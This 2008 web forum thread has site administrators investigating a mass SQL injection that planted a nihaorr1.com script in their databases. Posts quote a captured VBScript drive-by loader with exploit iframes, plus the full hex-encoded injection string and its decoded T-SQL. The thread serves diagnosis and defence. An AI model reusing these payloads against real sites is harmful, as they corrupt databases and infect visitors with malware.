Previous Next

• 04-17-2008, 5:35 PM

  kckriegs Joined on 08-15-2005, 7:55 PM Posts 11	Anyone know about www.nihaorr1.com/1.js? Reply Contact The db that supports our companies ecommerce is filling up with this url. We seem to be victims of a sql injection attack. Is anyone else experiencing? How are you resolving? We just happened to see this data...are there other adverse affects to resources other than data? Any shared experience would be helpful!

• 04-18-2008, 5:19 AM

  In reply to

  Rovastar Joined on 03-13-2008, 2:00 PM London, UK Posts 594

  Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact Not noticed anything. Looks dodgy though. I presume you have only just started getting these. Only from 11 Apr? That is when the domain nihaorr1.com was registered. IP geolocation shows this machine in Beijing, China What page are they hammering? What do the IIS logs say? Then look at that page. Nearly all hacks now are over http so it wil be the devs fault for having sloppy code. Most overused word in IT is 'should' as in 'That should work!?!'

• 04-18-2008, 5:34 AM

  In reply to

  Rovastar Joined on 03-13-2008, 2:00 PM London, UK Posts 594

  Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact Yeah it is a script bot that spreads virus seems to be very wild atm. Googling nihaorr1.com there are many references to it on sites http://www.google.co.uk/search?hl=en&q=nihaorr1.com&btnG=Search&meta= (11,000 references at the time) Even when I clicked on a link and the virus checker popped up warning me of a virus there. I'll not try again. It just seems to affect asp pages at the moment.  There was a few recent vulenerabilities with asp and IIS over the last 6 months like  http://www.microsoft.com/technet/security/Bulletin/MS08-006.mspx I expect it is explioting one of those. Take care. Most overused word in IT is 'should' as in 'That should work!?!'

• 04-18-2008, 10:25 AM

  In reply to

  onionlips Joined on 04-18-2008, 2:17 PM Posts 1

  Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact We have been hit by this as well. Lucky backup ran last night just prior to the attack. Our initial investigations are pointing at an attack through IIS using ASP in an overload.  whois lookup showing nihaorr1 registered via Chinese registrar xinnet.com I used the safety of a VM to look under the hood at the operations of the 1.js file. It writes several iframes to that seem to come up as page not found (Chinese language pack)  A look at the script is bit confusing and garbled (of course) but consistent reference is made to "cuteqq" as a variable and variable prefix. It creates an executable I have yet to determine its intent or impact. Googling "cuteqq" pulls up all sorts of harmful flagged pages.  Anyone have any insight on that?

• 04-18-2008, 1:16 PM

  In reply to

  autodynamic1 Joined on 04-18-2008, 5:11 PM Posts 1

  Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact I also have been hit by this attack on Saturday 4/12/08. It compromised our database and overwritten that script into all of your products. Luckily a database restore fixed the problem. Two days later the same thing happened, I have changed all the database and login passwords and did another db restore. Now today 4/18/08 we got hit again by the same thing but this time as the pages are loaded ActivX is activated and wants to run but of course I did not allow it. Anybody has successfully solved this situation?

  Tags: nihaorr1 xss sql injection

• 04-18-2008, 2:17 PM

  In reply to

  rwmorey Joined on 04-28-2003, 9:53 PM Posts 4	Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact Hi --  We have been hit with this virus/injection as well. We are running Windows 2003 and I believe I have all the security patches on our system. Does anyone have any idea how to prevent this from re-happening? Rich

• 04-18-2008, 3:17 PM

  In reply to

  eftennis Joined on 04-18-2008, 7:12 PM Posts 4

  Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact We were hit as well last week by a similar one.   aspder Now, last night we were hit by the nihaorr1 attack.  Last nights was a little more sophisticated.   It inserted script logic into various fields in the database.  We ran sql queries to clean it out since no data was removed.   It appears to be a SQL Injector.  But, we have not found the exact fix for our asp scripts to stop it.  I managed to find entries in our log files to show the time.  Interesting part is that it came from a local connection.  This appears to be a virus that hijacks a computer to do it's dirty work, since the source is not from China.

• 04-18-2008, 3:57 PM

  In reply to

  bcondrey Joined on 04-18-2008, 7:49 PM Posts 1	Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact Can you let me know what you searched for specifically in your logs? What was the internal PC infected with, did you get a virus name? We had a PC that was infected by a virus called infostealer , but we aren't sure if the PC caught it from the webserver, or vice-versa. Thanks Barry

• 04-18-2008, 7:57 PM

  In reply to

  davcox Joined on 07-21-2006, 2:28 PM Redmond Posts 113

  Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact Yikes, pretty dangerous, a good time to scan your content for this URL and notify the website owners so they can fix their websites, applications and then fix the form validation logic.    Looks like someone is doing a lot of script code injection into a lot of vulnerable (read: poorly written) forms that aren't validating input to strip out script code.  These sites are then carrying javascript code that launches Remote Data Services Control ActiveX control ... to exploit a few known vulnerabilities ... use WFetch to debug this!!!  (You can get WFetch for free in the IIS6.0 Resource Kit.) For example, here is how I looked at this: GET http://www.nihaorr1.com:80/1.js HTTP/1.1\r\n Host: www.nihaorr1.com\r\n Accept: */*\r\n \r\n HTTP/1.1 200 OK\r\n Connection: Keep-Alive\r\n Content-Length: 110\r\n Via: 1.1 RED-PRXY-29\r\n Date: Fri, 18 Apr 2008 23:53:38 GMT\r\n Content-Type: application/x-javascript\r\n ETag: "30e1873949a1c81:237"\r\n Server: Microsoft-IIS/6.0\r\n Last-Modified: Fri, 18 Apr 2008 11:42:04 GMT\r\n Accept-Ranges: bytes\r\n \r\n document.writeln("<iframe width=\'10\' height=\'1\' src=\'http:\/\/www.nihaorr1.com\/1.htm\'><\/iframe>");\r\n \r\n Then I made a second request to the iframe it tries to create:      GET http://www.nihaorr1.com:80/1.htm HTTP/1.1\r\n Host: www.nihaorr1.com\r\n Accept: */*\r\n \r\n HTTP/1.1 200 OK\r\n Connection: Keep-Alive\r\n Content-Length: 1160\r\n Date: Fri, 18 Apr 2008 23:53:51 GMT\r\n Content-Type: text/html\r\n ETag: "fc6b5a164da1c81:237"\r\n Server: Microsoft-IIS/6.0\r\n Last-Modified: Fri, 18 Apr 2008 12:09:43 GMT\r\n Accept-Ranges: bytes\r\n \r\n <script language=VBScript>\r\n on error resume next\r\n Set downf = document.createElement("object")\r\n downf.setAttribute "classid", "clsid:BD9"&"6C556-6"&"5A3-11D"&"0-983A-00C"&"04FC2"&"9E36"\r\n str="Microsoft.XMLHTTP"\r\n Set O = downf.CreateObject(str,"")\r\n if Not Err.Number = 0 then\r\n err.clear\r\n document.write("<iframe width=""10"" height=""10"" src=""http://www.nihaorr1.com/Real.gif""></iframe>") \r\n document.write("<iframe width=""5"" height=""5"" src=""http://www.nihaorr1.com/Yahoo.php""></iframe>")\r\n document.write("<iframe width=""5"" height=""5"" src=""http://www.nihaorr1.com/cuteqq.htm""></iframe>")  \r\n document.write("<iframe width=""5"" height=""5"" src=""http://www.nihaorr1.com/Ms07055.htm""></iframe>")  \r\n document.write("<iframe width=""5"" height=""5"" src=""http://www.nihaorr1.com/Ms07033.htm""></iframe>")  \r\n document.write("<iframe width=""5"" height=""5"" src=""http://www.nihaorr1.com/Ms07004.htm""></iframe>")\r\n else\r\n document.write("<iframe width=""0"" height=""0"" src=""http://www.nihaorr1.com/Ajax.htm""></iframe>")\r\n document.write("<iframe width=""0"" height=""0"" src=""http://www.nihaorr1.com/Ms06014.htm""></iframe>")\r\n end if\r\n </script>\r\n

• 04-19-2008, 9:36 AM

  In reply to

  asidana Joined on 03-20-2008, 12:02 PM Posts 16	Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact i've been using below regex function AlphaNumOnly(MyString) sResult=Trim(MyString)  Set re = New RegExp  re.IgnoreCase = True  re.Global = true  re.Pattern = "[^a-z|A-Z|0-9|\.]"  sResult = re.Replace(sResult, "")   AlphaNumOnly=sResult end Function  and got hit, couln't find anything in my serverlog about how its done

• 04-19-2008, 10:47 AM

  In reply to

  rwmorey Joined on 04-28-2003, 9:53 PM Posts 4	Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact I found this security notice on Microsofts website finally http://www.microsoft.com/technet/security/advisory/951306.mspx I have just made the prescribed changes. Hopefully this will stop this from getting me again.

• 04-20-2008, 12:06 AM

  In reply to

  powlette Joined on 10-16-2002, 10:08 AM Posts 1

  Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact  Long story short, it's definitely SQL injection. here's the offending url: orderitem.asp?IT=GM-204;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C004000 4300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F0072002000430055 00520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D00200073007900 73006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069 006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F0072002000 62002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D0031 0036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00 200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C00450028004000400046004500540043 0048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B00 27005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C 005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E006E00 6900680061006F007200720031002E0063006F006D002F0031002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E0045 00580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E0044002000 43004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F00430075 00720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);-- decoding that binary data which is cast to a varchar yields this: DECLARE @T varchar(255)'@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name'b.name from sysobjects a'syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T'@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar'['+@C+']))+''<script src=nihaorr1.com/1.js></script>''')FETCH NEXT FROM Table_Cursor INTO @T'@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor And there you have it. It finds all text columns in the database and adds itself to it.

• 04-20-2008, 11:46 AM

  In reply to

  rwmorey Joined on 04-28-2003, 9:53 PM Posts 4	Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact Is there a "best practice" for blocking this or similar type attacks?

• 04-20-2008, 12:51 PM

  In reply to

  eftennis Joined on 04-18-2008, 7:12 PM Posts 4

  Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact Thanks.   That is the first proof I have seen as to how this works.  We added a logging function to our sql calls to try to trap for this type of information. We have been adding a common script to the top of all of our pages to look for "offending" data in the url parms or the form variables.   Seems like a never ending task, though.  Doing the rework suggested to stop SQL Injectors is not an easy project given the hundreds of pages we have.  We are continuing to fight this.  It is a very "resource draining" project.

• 04-20-2008, 12:58 PM

  In reply to

  xtal Joined on 04-20-2008, 11:56 AM Posts 1

  Re: Anyone know about www.nihaorr1.com/1.js? Reply Contact "Best Practice" - lots of them - primarily checking each form processing script to ensure that one cannot simply pass in a long field and/or content which has sql commands such as "select", "update", etc. As you can see from this particular situation, the data may not be readily seen as offending (ie, the binary encoding).  Testing length is therefore pretty important as a rule.  If you are expecting to insert a product code into a shopping cart or an email address into a registration table, there is no reason to allow a string longer than the field length to be submitted to the database.  One could argue that because of that, keep your field lengths to the minimum, etc. Minimize the number of dynamic sql statements     Keep in mind that just limiting your form field's "maxlength" property does little value as these attacks are not validated by any server side browser - they are launched via script or program and often at a very rapid pace. If your db connection for your site is using "sa" or equivalent, you also have a problem because they can launch extended stored procs.  Make sure your db connection is using "user" level privileges only. these are some of the bigger items - there is lots on the net on the topic of 'sql injection'